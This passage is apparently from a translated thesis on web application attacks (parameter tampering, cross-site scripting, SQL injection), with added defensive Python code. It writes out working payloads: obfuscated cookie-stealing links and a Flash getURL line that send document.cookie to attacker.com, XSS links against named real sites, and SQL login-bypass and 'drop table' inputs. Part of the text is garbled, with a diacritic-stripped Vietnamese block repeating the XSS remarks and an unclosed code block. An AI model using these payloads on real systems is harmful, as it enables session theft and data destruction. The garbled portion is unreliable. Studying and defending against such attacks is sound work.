This attack technique mainly targets the information on the user's computer rather than the server system. By adding an arbitrary piece of code (usually written in a scripting language such as JavaScript or VBScript), the hacker can steal important information such as cookies and, using the stolen information, become a legitimate user of the application. Cross-site scripting is therefore also a form of session hijacking.
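The two defences implied by the paragraph above are that untrusted text must be encoded for the HTML context it lands in, and that a session cookie should be unreadable from script. As an added example, not code from the thesis, the block below renders a hypothetical comment fragment with context-aware escaping (text between tags versus a quoted attribute value) and builds a session Set-Cookie header carrying HttpOnly and Secure. The comment text is constructed.

```python
"""Context-aware HTML escaping plus a session cookie that script cannot read."""
import html

# Constructed untrusted input: what a visitor might type into a comment box.
CONSTRUCTED_COMMENT = "Nice article <script>alert(document.cookie)</script>"


def escape_text(value: str) -> str:
    """For text placed between tags: <, > and & must become entities."""
    return html.escape(value, quote=False)


def escape_attr(value: str) -> str:
    """For a double-quoted attribute value: quotes must be escaped as well,
    otherwise the value can close the attribute and start a new one."""
    return html.escape(value, quote=True)


def render_comment(author: str, text: str) -> str:
    """Hypothetical page fragment; every untrusted value passes through the
    escaper for the context it is inserted into."""
    return (
        f'<div class="comment" data-author="{escape_attr(author)}">'
        f"<b>{escape_text(author)}</b>: {escape_text(text)}</div>"
    )


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie for a session ID.

    HttpOnly keeps the value out of document.cookie, so a script that does run
    cannot read it; Secure keeps it off plain HTTP. Neither flag fixes the
    injection itself, which is what the escaping above is for.
    """
    return f"Set-Cookie: SID={session_id}; Path=/; Secure; HttpOnly"
```

Escaping is done at output time, per context, rather than by stripping characters at input time: the same string may be legitimate in one context and dangerous in another, and a blocklist applied on the way in is exactly the kind of check III.3 and III.4 describe getting around.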

III.7. OS command injection

The ability to execute system commands or code inserted into parameters that are not strictly checked, such as form parameters, cookies, HTTP request headers, and dangerous data in files uploaded to the server.

Success with this technique lets the hacker execute system commands with the same privileges as the web server.


III.8. SQL injection

When programming against a database, the programmer makes mistakes in checking the input values, and the hacker exploits this to add queries or invalid values in order to log in to the system easily.

III.9. Server-side includes

The ability to insert system-level directives such as including a file (include file), accessing a database (jdbc) and so on, giving the hacker a chance to access files, databases and other resources that normally cannot be viewed on the web site.

III.10. Null characters

This exploits the fact that strings usually end in \0, which the hacker inserts to fool the application: applications whose CGI programs are written in C++ treat \0 as the end of the string.

For example, the hacker enters the following string (the text before \0 is arbitrary):

input: ti th nht\0 alert(document.cookie)

If the application uses a C++ program to check the validity of the string, the string above passes, because C++ takes \0 as the end of the string and does not check the part after it.
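The failure mode above can be reproduced without writing C. As an added example, not code from the thesis, the block below passes a constructed input through ctypes.c_char_p, which reads the buffer exactly as a NUL-terminated C string API would, and compares a validator built on that view with one that checks the whole buffer and treats an embedded NUL as invalid in its own right.

```python
"""Why a NUL byte defeats a validator that runs through a C string API."""
import ctypes
import re

# Constructed input modelled on the example above: harmless text, a NUL, then a payload.
CONSTRUCTED_INPUT = b"first prize\x00<script>alert(document.cookie)</script>"

FORBIDDEN = re.compile(rb"<\s*script", re.IGNORECASE)


def as_c_string(data: bytes) -> bytes:
    """Everything a NUL-terminated C API (strlen, strcpy, ...) would read."""
    return ctypes.c_char_p(data).value or b""


def validate_c_style(data: bytes) -> bool:
    """Faithful to the defect: only the bytes before the first NUL are examined."""
    return FORBIDDEN.search(as_c_string(data)) is None


def validate_length_aware(data: bytes) -> bool:
    """Hardened: the whole buffer is examined, and a NUL in text input is itself invalid,
    because a later C-based component may still truncate at it."""
    if b"\x00" in data:
        return False
    return FORBIDDEN.search(data) is None
```

The second validator rejects the NUL outright rather than trying to scan past it, because even a correct scan here does not help if some later component (a C library, a file API, a database driver) stops at the NUL and sees a different string than the validator did.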

III.11. Parameter manipulation

The information exchanged between server and browser is kept in variables such as URL variables, hidden form fields, cookies and so on. Because control of these variables has not received the attention it deserves, the hacker can modify their values to steal a user's session or change the price of an item.

IV. INFORMATION DISCLOSURE

Files and applications on the system that hold important information, such as the source code of a web page or a file containing users' passwords, are always targets for hackers. Comments in source code are also a useful source of information for hackers.

Hackers use the HTTP responses of a system to determine whether a file or application exists.

Example 1.IV-1:

HTTP 200: the file exists
HTTP 404: the file does not exist

V. DENIAL OF SERVICE (DoS)

A large volume of requests is sent to the application within a given period, so that the system cannot keep up with the requests and breaks down.

Because the scope and time of this thesis are limited, it studies only a number of common techniques with a high potential for damaging a network system. In the chapters of part two the thesis presents the following techniques in more detail:

- Parameter manipulation
- Injecting code that runs in the browser
- SQL injection
- Session takeover
- Buffer overflow
- Denial of service
- A few other techniques:
  o Null characters
  o URL encoding
  o Exploiting the path used to access a file
  o Server-side languages

PART TWO

ATTACK TECHNIQUES AND SECURITY OF WEB APPLICATIONS

Chapter 4

PARAMETER MANIPULATION

Contents:
I. Manipulating the URL
II. Manipulating hidden form fields
III. Manipulating cookies
IV. Manipulating HTTP headers


CHAPTER 4: PARAMETER MANIPULATION

Parameter manipulation is the technique of altering important information carried in cookies, the URL or hidden form fields. Cross-Site Scripting, session ID attacks, SQL Injection, Buffer Overflow and similar techniques also rely on these parameters to complete the hacker's attack steps. The parameters passed to an application can be called the starting point for everything the hacker does while attacking it. That is why this is the first chapter of Part Two; its purpose is also to support the presentation of the chapters that follow.

I. MANIPULATING THE URL

I.1. Concept:

When an HTML form is submitted, the result is sent in one of two ways: GET or POST. With GET, all variable names and their values appear in the URL string.

Example 4.I.1-1: a Web application page lets a member change his password:

http://www.nganhang.com/example?user=thang&newpass=123

where:

+ user is the name of the user whose password is to be changed;
+ newpass is the new password for that user.

However, by changing the parameters as follows:

http://www.nganhang.com/example?user=admin&newpass=111111

the hacker can set the admin account to any new password of his choosing, in this example 111111.

I.2. Some countermeasures

To defend against changes to the contents of a URL string, the application can apply the following measure:

The application uses a hash table (hash table). After the user has authenticated successfully with a username, the application generates a corresponding key. This key is stored on the server together with the username in the hash table object. Each time the user connects to the application, the key and username are sent along and compared with the key and username in the hash table. If they match the stored record, the request is valid; otherwise the server knows the user has altered the URL.

For this to work the key must be random and unguessable, and the decision of whose password is being changed must come from the key's record on the server, not from the user parameter in the URL.

In addition, valuable information should be encrypted before it is displayed in the browser, so that the hacker cannot modify it at will. Encryption by itself only hides a value; to detect modification the value must also carry an integrity check (a message authentication code), or be looked up on the server instead.

II. MANIPULATING HIDDEN FORM FIELDS

II.1. Concept

Information is also passed through hidden form fields (Hidden Form Field). A hidden field is not displayed in the browser window, but the user can find its contents with 'view source'. This is a weakness the hacker exploits by saving the Web page to disk, editing its contents and submitting it to the server.

Example 4.II.1-1: the original form has the following contents (a hidden field named giaca carrying the price):

...
...

If nothing is changed, the request to the server reads:

POST /cuahang.pl HTTP/1.0
...
giaca=99.99

But if the hacker assigns a different value to the giaca field:

...
...

then the request changes to:

POST /cuahang.pl HTTP/1.0
...
giaca=0.99

Besides altering the contents of hidden fields, the hacker can also alter other properties of the form's elements, such as the maximum length of an input box, in order to carry out a BUFFER OVERFLOW attack, and so on.


II.2. Some countermeasures

Use hidden form fields only to display data in the browser; never use a hidden field's value directly in the application's processing.

Use the HTTP_REFERER variable to check the origin of an incoming request. The hacker can, however, use a proxy to hide the real origin (or simply rewrite the header), so HTTP_REFERER should not be trusted too far as a check.

Concatenate the names and values of the hidden fields into a single string. Apply MD5 or another one-way hash to that string, together with a secret key, and store the digest in a further hidden field, the 'reference string'.

When the form values are submitted, repeat the same operations with the same secret key chosen beforehand. Then compare the result with the 'reference string'; if they do not match, the values in the form have been changed.

A plain hash without a secret is useless here, since the hacker can recompute it for his modified values; the digest must be a keyed MAC (HMAC-SHA256 rather than bare MD5), the comparison should be constant-time, and the signed fields should be bound to the session or a timestamp so an old signed price cannot simply be replayed.

Use a session ID that refers to information stored in the database.
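The 'reference string' countermeasure, as an added example (not code from the thesis), done with a keyed digest and a constant-time comparison. It assumes a server-side secret SERVER_KEY that never appears in the page and a hidden field named chuoimau for the digest; the shop form's fields are constructed for the demonstration, with giaca taken from example 4.II.1-1 and masp invented.

```python
import hashlib
import hmac
import secrets

# Assumed server-side secret. Generated at import time here; in a deployment it is
# created once, stored outside the web root, and never sent to the browser.
SERVER_KEY = secrets.token_bytes(32)


def canonical(fields: dict) -> bytes:
    """Serialize name/value pairs in a fixed order with explicit lengths, so both sides
    hash identical bytes and no split of the string can be confused with another."""
    parts = []
    for name in sorted(fields):
        value = str(fields[name])
        parts.append(f"{len(name)}:{name}={len(value)}:{value}")
    return "|".join(parts).encode()


def sign_fields(fields: dict, key: bytes = SERVER_KEY) -> dict:
    """Return the hidden fields plus the keyed digest ('reference string') over them."""
    tag = hmac.new(key, canonical(fields), hashlib.sha256).hexdigest()
    return {**fields, "chuoimau": tag}


def verify_fields(submitted: dict, key: bytes = SERVER_KEY) -> bool:
    """Recompute the digest over the submitted fields and compare in constant time."""
    submitted = dict(submitted)
    tag = submitted.pop("chuoimau", None)
    if tag is None:
        return False
    expected = hmac.new(key, canonical(submitted), hashlib.sha256).hexdigest()
    return hmac.compare_digest(tag, expected)


# Constructed sample: the shop form of example 4.II.1-1 as the server emits it.
ORIGINAL_FORM = sign_fields({"giaca": "99.99", "masp": "A17"})


def tampered_copy(form: dict) -> dict:
    """The hacker's edited copy: price changed, digest left as it was."""
    return {**form, "giaca": "0.99"}
```

A copy with the price rewritten fails verification, as does a submission that drops the digest altogether; the server then rejects the order instead of charging 0.99.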


III. MANIPULATING COOKIES

III.1. Concept

Part One, Chapter 2, Section IV presented the basic concept of a cookie. This section only presents how a cookie can be altered.

Cookies are commonly treated as the most trustworthy of the three places to keep state, and are therefore preferred over hidden form fields and URL variables for holding state across HTTP requests. They are also used to store a user's information while he is using the application, along with other session data. That trust is misplaced: every kind of cookie, persistent or non-persistent, secure or insecure, can be altered by the user and sent back to the server, so the hacker can change a cookie's contents to subvert the application.

With free tools such as WinHex even a non-persistent cookie's contents can be changed. SSL only protects a cookie while it is in transit.

Example 4.III.1-1: a cookie used to store information for a travel-information Web application:

Cookie: lang=en-us; ADMIN=no; y=1 ; time=10:30GMT ;

The cookie identifies this user as not an Admin (ADMIN=no), but what happens if the hacker changes this field? He can rewrite it as follows:

Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30GMT ;

The hacker now takes on the role of an administrator of the application.


III.2. Some countermeasures

Use a session object to keep important information on the server. When the application needs to check a user's information, it uses the user's session ID to look up that information in the cache or the database.

Build a mechanism that checks a cookie's contents for inconsistent values, which reveal a forged cookie. For example, the 'administrator' flag in the cookie may be set to true while the user number in the cookie does not match the administrator's user number stored on the server.

The last method is to encrypt the cookie. There are several approaches, such as symmetric (one key for both encryption and decryption) or asymmetric (two separate keys, a public key for encryption and a private key for decryption).

Encryption hides the cookie's contents but does not by itself stop modification or replay: without an authentication tag the hacker can still flip bits in the ciphertext or present an old cookie. In practice the cookie should carry only an opaque random session identifier, and every authorization decision should be made from the session record on the server.
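The server-side approach recommended in I.2 (a key-to-username table checked on every request) and III.2 (authorization read from the session, never from cookie fields), as one added example serving both sections; it is not code from the thesis. The user table, the roles and the cookie name sid are constructed for the demonstration; usernames follow the thesis's examples.

```python
import secrets
from typing import Optional

# Constructed user database: names from the thesis's examples, roles assumed.
USERS = {
    "thang": {"password": "123", "admin": False},
    "admin": {"password": "passOfAdmin", "admin": True},
}


class SessionStore:
    """The server-side 'hash table' of section I.2: opaque random key -> username.
    Only the key ever leaves the server; identity and role live here."""

    def __init__(self):
        self._sessions = {}

    def login(self, username: str, password: str) -> Optional[str]:
        user = USERS.get(username)
        if user is None or user["password"] != password:
            return None
        key = secrets.token_urlsafe(32)   # unguessable and unrelated to the username
        self._sessions[key] = username
        return key

    def whoami(self, key: Optional[str]) -> Optional[str]:
        return self._sessions.get(key) if key else None

    def is_admin(self, cookie: dict) -> bool:
        """Authorization comes from the server record. An 'ADMIN=yes' the client
        adds to the cookie is simply never consulted."""
        username = self.whoami(cookie.get("sid"))
        return bool(username) and USERS[username]["admin"]

    def change_password(self, cookie: dict, requested_user: str, newpass: str) -> bool:
        """Handler for ?user=...&newpass=... : the URL names a target, the session
        names the caller, and they must agree unless the caller is an administrator."""
        caller = self.whoami(cookie.get("sid"))
        if caller is None or requested_user not in USERS:
            return False
        if caller != requested_user and not USERS[caller]["admin"]:
            return False
        USERS[requested_user]["password"] = newpass
        return True


def parse_cookie(header: str) -> dict:
    """Parse 'a=b; c=d' into a dict, tolerating stray spaces and empty parts."""
    result = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.split("=", 1)
            result[name.strip()] = value.strip()
    return result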

IV. MANIPULATING HTTP HEADERS

The URL, hidden form fields and cookies are all places where information is stored that an ordinary user can view and change. All of them, however, travel inside the HTTP headers. So although the HTTP header is not itself a parameter of the application, every piece of information passes through it before being exchanged, which is why this section covers altering an HTTP header.

IV.1. Concept

Normally only the browser and the server exchange HTTP headers (see Part One, Chapter 2, Section II for details); most Web applications do not handle them directly. The hacker, however, can write his own program to control the HTTP headers (view them, create new ones), or use one of the free proxies that allow the data sent by the browser to be modified. He can also attack directly by using telnet to send an HTTP request to the server.

Example 4.IV.1-1:

su-2.05# telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET / HTTP/1.0
Referer: www.redhat.com/login.asp
User-Agent:

HTTP/1.1 200 OK
Date: Mon, 17 Dec 2001 20:39:02 GMT
Server:
Connection: close
Content-Type: text/html

The Referer line is the header the hacker has altered: he typed it himself, so it carries whatever value he chose.

Example 4.IV.1-2:

The Referer header contains the URL of the page from which the request was sent. Some applications therefore check this header to make sure the request came from one of the application's own pages. This is meant to stop the hacker from saving the page locally, editing the form's attributes, defeating client-side validation or targeting server-side includes, and then submitting it. The check fails, however, as soon as the hacker rewrites the Referer header so that the request looks as if it came from a legitimate page:

Referer: www.redhat.com/login.asp

IV.2. Some countermeasures

Simply do not trust HTTP headers unless further safeguards are in place. Headers that originate from the server, such as the cookie, should be encrypted and integrity-protected. For headers that originate from the client, parameters such as Referer should not be relied on to enforce security measures.

Remarks:

No important information exchanged between browser and server should be stored as a plain string; it should be encrypted, and it should also be checked against the data held in the server's database or cache, to guard against its content having been altered.

Beyond that, validating input data is essential, because nearly all attack techniques rely on data supplied through the URL, hidden form fields or cookies, as with the Cross-Site Scripting attack in the next chapter or SQL Injection in Chapter 6.

Chapter 5

INJECTING CODE THAT EXECUTES IN THE VICTIM'S BROWSER

Contents:
I. Cross Site Scripting (XSS)
II. The traditional XSS attack method
III. Some websites found to have XSS holes
IV. XSS attack via Flash
V. Prevention


CHAPTER 5:

INJECTING CODE THAT EXECUTES IN THE VICTIM'S BROWSER (CROSS SITE SCRIPTING)

I. THE CROSS SITE SCRIPTING (XSS) ATTACK TECHNIQUE

Cross Site Scripting (abbreviated XSS) is an attack that inserts code capable of stealing or setting important information such as cookies or passwords into the page served by a Web application, so that the code runs as part of the Web application and delivers or carries out whatever the hacker wants.

This attack does not target the server; it mainly attacks the user's own machine. The hacker exploits lax validation in the application together with the limited knowledge and the curiosity of users, so that users give up their information easily.

Typically the hacker uses the URL to craft links that trigger client-side script (VBScript, JavaScript, ...) which then executes in the victim's own browser.

Example 5.I-1:

http://hotwired.lycos.com/webmonkey/00/index1.html?tw=<script>alert(document.cookie)</script>;


or:

http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

The script portion is the code added with the purpose of stealing the victim's cookies.

In the examples above, most of the URL prefixes are the addresses of real Web applications (e.g. http://www.microsoft.com/education, http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/...), and it is the way parameters are passed on the URL that lets the hacker easily add cookie-stealing code.

Example 5.I-1 only illustrates the simplest case: adding code to a page through the URL. In reality there are many ways to insert JavaScript for an XSS attack. The hacker can easily use the Document Object Model (DOM) to alter the context and content of the Web application.

Below is a list of places where code can be inserted:

Example 5.I-2:

&[code]
&{[code]};
[code]
[code]
[code];

(source: http://online.securityfocus.com/archive/1/272037/2002-05-09/2002-05-15/0)

[code] marks the place where the information-stealing code can be placed.

II. THE TRADITIONAL XSS ATTACK METHOD

Web applications usually keep important information in cookies. A cookie is a piece of information the application stores on the user's hard disk, and only the site that set the cookie can read it back. So the hacker can only steal a cookie while the user is inside a session with the application. The hacker's first job, after finding a hole in the application, is to locate the page where users log in.

Steps of a traditional XSS attack:

Figure 5.II-1. How an XSS attack proceeds

Summary of the steps:

Step 1: The hacker knows the user is using a Web application that has an XSS hole.

Step 2: The user receives a link, through e-mail or on the Web page itself (a guestbook or banner where the hacker can easily add a link of his own). The hacker usually draws the user's attention with phrases that appeal to curiosity, such as 'Check your account' or 'An attractive prize is waiting for you'.

Step 3: The stolen information (cookie, username, password) is sent to the hacker's server.

Step 4: The hacker has set up a CGI program (steal.cgi in the example below) or a Web page that records the stolen information into a file.

Step 5: With the information obtained, the hacker can break into the user's account.


Example 5.II-1: to exploit the hole in hotwired.lycos.com the hacker can proceed as follows:

Look at this!

An attractive prize is waiting for you

After the user clicks the link 'An attractive prize is waiting for you', the cookie on the victim's machine is stolen and passed as a parameter to the hacker's steal.cgi program:

http://www.attacker.com/steal.cgi?lubid=010000508BD3046103F43B8264530098C20100000000;%20p_uniqid=8sJgk9daas7WUMxV0B;%20gv_titan_20=5901=1019511286

The question then is that the developer may protect his Web application by filtering special characters such as ' or + (for instance to stop ' from being used to run SQL queries). The hacker can get around this by using hex codes in place of the special characters.

Replace the ASCII characters with their hex codes.

Example 5.II-2:


http://www.attacker.com/steal.cgi:

h -> 0x0068
t -> 0x0074
t -> 0x0074
p -> 0x0070
: -> 0x003A
/ -> 0x002F

Below is an example of using hex codes in a Web application.

Example 5.II-3:

Look at this!

u %2B= String.fromCharCode(0x0063);u %2B= String.fromCharCode(0x006B);
u %2B= String.fromCharCode(0x0065);u %2B= String.fromCharCode(0x0072);u %2B= String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x006F);u %2B= String.fromCharCode(0x006D);
u %2B= String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0073);
u %2B= String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0065);u %2B= String.fromCharCode(0x0061);u %2B= String.fromCharCode(0x006C);
u %2B= String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x0067);u %2B= String.fromCharCode(0x0069);
u %2B= String.fromCharCode(0x003F);
u %2B=document.cookie;document.location.replace(u);"
onMouseOver="window.status='http://www.hotwired.lycos.com/index2.html';return true"
onMouseOut="window.status='';return true">An attractive prize is waiting for you

The start of this anchor element, where u is declared and the first part of the URL is built, is cut off in this copy; the fromCharCode calls shown spell out 'cker.com/steal.cgi?'. The script then appends document.cookie to u and calls document.location.replace(u), sending the browser, cookie included, to the hacker's CGI. The %2B sequences are URL-encoded '+' signs, so no literal '+' or '<' has to survive the application's filter, and the onMouseOver handler overwrites window.status so that the status bar shows a harmless hotwired URL while the victim hovers over the link.
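An analyst's decoder for payloads of the kind shown in example 5.II-3, as an added example that is not part of the thesis: it URL-decodes the fragment, rebuilds the string assembled by the chain of String.fromCharCode calls, and flags the sinks an incident responder looks for. The sample input is the tail of the anchor element as it appears on the page (constructed here as a string); the sink list is an assumption.

```python
import re
from urllib.parse import unquote

# Constructed sample: the visible tail of the anchor from example 5.II-3, with the
# URL-encoded '+' and one String.fromCharCode call per character, as on the page.
SAMPLE_PAYLOAD = (
    "u %2B= String.fromCharCode(0x0063);u %2B= String.fromCharCode(0x006B);"
    "u %2B= String.fromCharCode(0x0065);u %2B= String.fromCharCode(0x0072);"
    "u %2B= String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x0063);"
    "u %2B= String.fromCharCode(0x006F);u %2B= String.fromCharCode(0x006D);"
    "u %2B= String.fromCharCode(0x002F);u %2B= String.fromCharCode(0x0073);"
    "u %2B= String.fromCharCode(0x0074);u %2B= String.fromCharCode(0x0065);"
    "u %2B= String.fromCharCode(0x0061);u %2B= String.fromCharCode(0x006C);"
    "u %2B= String.fromCharCode(0x002E);u %2B= String.fromCharCode(0x0063);"
    "u %2B= String.fromCharCode(0x0067);u %2B= String.fromCharCode(0x0069);"
    "u %2B= String.fromCharCode(0x003F);"
    "u %2B=document.cookie;document.location.replace(u);"
)

CHARCODE = re.compile(r"String\.fromCharCode\(\s*([^)]*)\)")
NUMBER = re.compile(r"0[xX][0-9a-fA-F]+|\d+")

# Assumed list of names worth flagging: cookie access and forced navigation.
SINKS = ("document.cookie", "document.location", "window.location",
         "location.replace", "window.status")


def decode_charcodes(script: str) -> str:
    """Rebuild the literal that a chain of String.fromCharCode(...) calls assembles.
    Accepts hex or decimal code points and any number of arguments per call."""
    script = unquote(script)          # %2B -> '+', %3C -> '<', and so on
    chars = []
    for args in CHARCODE.findall(script):
        for token in NUMBER.findall(args):
            base = 16 if token.lower().startswith("0x") else 10
            chars.append(chr(int(token, base)))
    return "".join(chars)


def suspicious_sinks(script: str) -> list:
    """Return the flagged names present in the (URL-decoded) script, in SINKS order."""
    script = unquote(script)
    return [name for name in SINKS if name in script]
```

Run over the page's own fragment the decoder yields the string 'cker.com/steal.cgi?', and the sink scan reports document.cookie and document.location.replace, which together are the exfiltration pattern of Figure 5.II-1.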

III. SOME WEBSITES FOUND TO HAVE XSS HOLES

Company | Domain | Exploited link
NBC | http://www.shopnbc.com | http://www.shopnbc.com/listing.asp?qu=<script>alert(document.cookie)</script>&frompage=4&page=1&ct=VVTV&mh=0&sh=0&RN=1
Microsoft | http://www.microsoft.com/ | http://www.microsoft.com/education/?ID=MCTN&target=http://www.microsoft.com/education/?ID=MCTN&target=<script>alert(document.cookie)</script>
Chase | https://www.chase.com/ | https://www.chase.com/chase/gx.cgi/FTcs?pagename=<script>alert(document.cookie)</script>&urlname=smallbusiness/direct
EBay | https://scgi.ebay.co.uk/ | https://scgi.ebay.co.uk/saw-cgi/eBayISAPI.dll?SSLRegisterShow&countryid=3&siteId=3&co_partnerId=0&UsingSSL=1&aolemail=<script>alert(document.cookie)</script>
Oracle Japan | http://www.oracle.co.jp/ | http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text=<script>alert(document.cookie)</script>

IV. XSS ATTACK VIA FLASH

Besides the ways of injecting dangerous code described above, the hacker can also use Flash files to steal information.

Macromedia Flash can be programmed in its built-in scripting language, ActionScript. ActionScript has a simple syntax similar to JavaScript, C or PERL. For example the getURL() function loads another Web page; its parameter is normally a URL such as http://www.yahoo.com.

Example 5.IV-1:

getURL("http://www.yahoo.com")

The URL can, however, be replaced with JavaScript:

getURL("javascript:alert(document.cookie)")

Example 5.IV-1 displays a dialog containing the cookie of the Web page that embeds the Flash file. The page is thus attacked by injecting JavaScript into the Web application through a Flash file. A clearer example of this attack:

This is the code inside the Flash file; it runs as soon as the file is loaded:

getURL("javascript:location('http://www.attacker.com?newcookie='+document.cookie)")

So when the user views the page containing this Flash file, the cookie that page created for him is immediately sent to the hacker.


Figure 5.IV-2: Writing ActionScript in Flash

Example 5.IV-2:

DeviantArt is a well-known site that lets its members upload Flash files for other members to view. The hacker can therefore steal members' cookies, possibly including the Web administrator's account, by registering as a member of this Web application, uploading a Flash file to the server and waiting for victims to view it. Below is a link to a Flash file of the kind described above:

http://www.deviantart.com/deviation/1386080

Sites that let members post HTML, such as forums or signature features, can also be targets of this attack, by inserting the code that embeds the Flash file.

... HEIGHT="48" id="1" ALIGN="">

V. PREVENTION

For data entered by users, the designer of the Web application should perform the following basic steps:

o Create a list of the HTML tags that are allowed.
o Remove script tags.
o Filter out any JavaScript/Java/VBScript/ActiveX/Flash-related code.
o Filter single and double quotes.
o Filter the Null character (because arbitrary code can be appended after a Null character, and an application that has filtered tags will still not notice it, since it assumes the string ends at the Null).
o Remove the characters > and <.
o Or still allow special characters to be entered, but encode them according to a fixed scheme.

Of these, only the last is robust. Removing particular tags or characters is a blacklist, and a blacklist is defeated by anything it did not foresee (a tag in mixed case, an event handler attribute, an encoded form). Encoding every untrusted value for the context it is written into keeps the data and lets the browser render rather than execute it; marking session cookies HttpOnly additionally keeps document.cookie out of reach of injected script.

For the user, the browser should be configured to ask whether scripting languages may run on his machine; the user decides according to how much he trusts the site.

Remarks:

XSS is quite common and easy to apply, but the damage is limited to attacks on the victim's machine through deceptive links or forms that the hacker sends to the victim. So besides the application validating data before using it, it is most important that users stay alert before entering an unfamiliar Web page. One could say that user vigilance alone achieves 90% of the protection against this technique; this overstates the user's part, since a stored payload (as in the Flash and guestbook cases above) fires on a legitimate page the user had every reason to trust, so the burden really rests with the application. In Chapter 6, however, the attack turns to the server, aiming to harvest information from the database and from there seize administrative control of the application.
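Output encoding compared with tag removal, as an added example that is not part of the thesis. The three payloads are constructed: the first is the one from example 5.I-1, the other two are the two standard ways a tag blacklist is sidestepped. The page template and the detector are assumptions made for the demonstration.

```python
import html
import re

# Constructed payloads: the thesis's own, a mixed-case variant, and an event handler
# that needs no script tag at all.
PAYLOADS = [
    "<script>alert(document.cookie)</script>",
    "<ScRiPt>alert(document.cookie)</ScRiPt>",
    '<img src=x onerror="alert(document.cookie)">',
]


def blacklist_filter(value: str) -> str:
    """The 'remove script tags' bullet as it is usually coded: a literal replace."""
    return value.replace("<script>", "").replace("</script>", "")


def encode_for_html(value: str) -> str:
    """The last bullet done properly: keep the characters but encode them for the
    HTML text context, so the browser displays them instead of parsing them."""
    return html.escape(value, quote=True)


def render_search_page(term: str, sanitizer) -> str:
    """Assumed page template that reflects the search term (the hotwired/Oracle pattern)."""
    return f"<p>Results for: {sanitizer(term)}</p>"


# Judge of the output: does the reflected region still contain a raw HTML start tag?
START_TAG = re.compile(r"<\s*[a-zA-Z][^>]*>")
PREFIX, SUFFIX = "<p>Results for: ", "</p>"


def still_executable(page: str) -> bool:
    body = page[len(PREFIX):len(page) - len(SUFFIX)]
    return START_TAG.search(body) is not None
```

The blacklist neutralises exactly the payload its author had in mind and nothing else; the encoder handles all three without knowing any of them, which is the property a defence needs.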

    Nhn xt:

    Kthut XSS kh phbin v d dng p dng, tuy nhin mc thit hi ch dng

    li mc tn cng trn my nn nhn thng qua nhng lin kt hay form la om hackera n cho nn nhn. V th, ngoi vic ng dng kim tra tnh ng n

    ca d liu trc khi s dng th vic cn nht l ngi dng nn cnh gic trc khi

    bc vo mt trang Web mi. C th ni, nhvo s cnh gic ca ngi dng th

    90% t c s bo mt trong k thut ny. Tuy nhin, trong chng 6, s tn

    cng li nhm vo my ch, nhm thu thp thng tin trong c s d liu v t

    ginh quyn qun tr ng dng.

Chapter 6

SQL QUERY INJECTION

Contents:
I. The concept of SQL Injection
II. The database model
III. The attacks
IV. Prevention


CHAPTER 6:

SQL QUERY INJECTION (SQL INJECTION)

I. THE CONCEPT OF SQL INJECTION

SQL Injection exploits holes in the way a Web application is programmed and accesses its database. It is not a flaw of SQL Server alone; it is a problem common to all other databases such as Oracle, MS Access or IBM DB2.

When the hacker submits data (through forms), the Web application executes it and returns to the browser either the result of the query or the database-related error messages. From that information the hacker learns the contents of the database and from there gains control of the entire application.

II. THE DATABASE MODEL

To present this technique better, the thesis uses a User table to illustrate the attacks.

User table:

No. | Field name | Physical setting | Field type | Size | Description
1 | tkUsername | Primary key | Text | 50 | Each user has one login account.
2 | tkPassword | | Text | 50 | Login password


Convention:

The programming language used for the illustrations in this chapter is ASP, with SQL Server as the database.

III. THE ATTACKS

III.1. The SQL Injection technique

Below is the simplest SQL injection technique, used to get past login forms.

Example 6.III.1-1: suppose the Web application contains the following code:

SQLQuery = "SELECT tkUsername FROM User WHERE tkUsername='" & strUsername & "' AND tkPassword='" & strPassword & "'"
flag = GetQueryResult(SQLQuery)
if flag = "" then
    check = FALSE
else
    check = TRUE
end if

The code checks the Username and Password strings entered. If they exist in the User table then check = true, otherwise check = false.

Suppose the hacker enters:

Username: ' OR ''='
Password: ' OR ''='


The SQL statement now becomes:

SELECT tkUsername FROM User WHERE tkUsername='' OR ''='' AND tkPassword='' OR ''=''

The comparison ''='' is always true, so the condition in the WHERE clause is always true (AND binds tighter than OR, so it reads tkUsername='' OR (''='' AND tkPassword='') OR ''='', which holds for every row). The username from the first row of the table is selected.

Combined with SQL's special characters:

the character ; marks the end of one query;
the characters -- comment out the rest of the line.

Example 6.III.1-2:

Username: '; drop table User--
Password:

The SQL statement now becomes:

SELECT tkUsername FROM User WHERE tkUsername=''; drop table User--' AND tkPassword=''

With this statement the User table is deleted entirely.

Example 6.III.1-3: another example using SQL special characters to break into the system:

Username: admin'--
Password:


The SQL statement becomes:

SELECT tkUsername FROM User WHERE tkUsername='admin'--' AND tkPassword=''

This statement logs the hacker in as admin without asking for a password.

III.2. Attacks based on the SELECT statement

Beyond the simple technique above, attacks usually rely on error messages to obtain information about the tables and their fields. Doing so requires understanding the error messages and adjusting the input accordingly.

The concept of Direct Injection:

Arguments that are inserted into the statement without being enclosed in single or double quotes are the direct injection case; see Example 6.III.2-1.

Example 6.III.2-1:

StrSQL = "SELECT tkUsername FROM User WHERE tkUsername=" & tName

The concept of Quote Injection:

Cases where the argument entered is placed by the application between two single or double quotes are the Quote Injection case; see Example 6.III.2-2.

Example 6.III.2-2:

StrSQL = "SELECT tkUsername FROM User WHERE tkUsername='" & tName & "'"


To neutralise the quotes and change the statement while keeping its syntax valid, the injected string must start with a single quote that closes the one the application opened, and the statement must still end with the application's closing quote. Entering ' and ''= for tName, for instance, produces:

SELECT tkUsername FROM User WHERE tkUsername='' and ''=''

If the resulting error message mentions a parenthesis (, the injected string must also contain a ):

Example 6.III.2-3: suppose:

StrSQL = "SELECT tkUsername FROM User WHERE (tkUsername='" & tName & "')"

Then entering ') or ''=' yields valid syntax:

SELECT tkUsername FROM User WHERE (tkUsername='') or ''='')

The % character is also often used where the application performs searches.

Example 6.III.2-4:

